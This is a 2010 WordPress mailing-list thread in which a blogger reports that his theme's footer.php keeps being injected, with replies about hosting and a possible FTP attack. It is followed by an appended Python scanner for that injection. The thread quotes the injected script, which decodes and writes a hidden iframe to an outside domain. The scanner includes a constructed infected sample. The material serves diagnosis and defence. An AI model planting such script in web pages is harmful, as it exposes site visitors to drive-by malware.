[wp-hackers] wordpress theme script injection (hosted on dreamhost)
mladen.adamovic at gmail.com
Sun Oct 31 16:50:06 UTC 2010
Regarding hosting - I have other websites hosted at my dreamhost account and
they haven't been hacked so far. That's good, otherwise I'll have
days of work to fix it.

Godaddy has a slow and unresponsive panel compared to dreamhost - I have some
websites hosted there as well.

I understand that some individuals and companies are offering Wordpress
hosting; however, for me Blogger could do - and it's free. Since my blog has
around 25 readers I don't have economical reasons to pay for managed

On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:
> Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
> Mladen Adamovic wrote:
> > Hi guys,
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> > I don't know which exploit it did use and couldn't identify it, but it
> > adding the following code to my default theme footer.php:
> > <script>
> > enc =
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> > I think I'll have to migrate to Blogger, since I couldn't identify
> > it did use.
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> Vid Luther
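
A defensive check for the injection pattern quoted in this thread (a `<script>` block in a theme file that `unescape()`s a percent-encoded string and `document.write()`s it), as an added example that is not part of the original thread. The function names, the sample files and the `injected.example` host are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r"""(["'])(.*?)\1""", re.S)   # quoted JS string literals
IFRAME_SRC_RE = re.compile(r"""<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

# Constructed samples: an infected footer.php and a harmless one.
SAMPLE_INFECTED = """<div id="footer">
<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20src%3D%27http%3A//injected.example/x.php%27%20width%3D1%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
</div>
"""
SAMPLE_CLEAN = '<div id="footer"><script>document.write("<p>hi</p>");</script></div>\n'

def find_injections(text):
    """Flag <script> blocks that both unescape() and document.write(),
    and decode their percent-encoded strings to recover iframe targets."""
    hits = []
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        if not (re.search(r"\bunescape\s*\(", body)
                and re.search(r"\bdocument\.write\s*\(", body)):
            continue
        # unquote() matches JS unescape() for plain %XX ASCII escapes (not %uXXXX).
        decoded = [unquote(s) for _, s in STRING_RE.findall(body) if "%" in s]
        srcs = [u for d in decoded for u in IFRAME_SRC_RE.findall(d)]
        hits.append({"line": text.count("\n", 0, m.start()) + 1, "iframe_src": srcs})
    return hits

def scan_theme_dir(root):
    """Scan every *.php file under root; return {path: hits} for flagged files."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_injections(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    print(find_injections(SAMPLE_INFECTED))
```

Run `scan_theme_dir()` against a copy of `wp-content/themes` and compare flagged files with a clean download of the theme; a hit in a file that should be unmodified also points to checking FTP and file-permission exposure, as the reply above suggests.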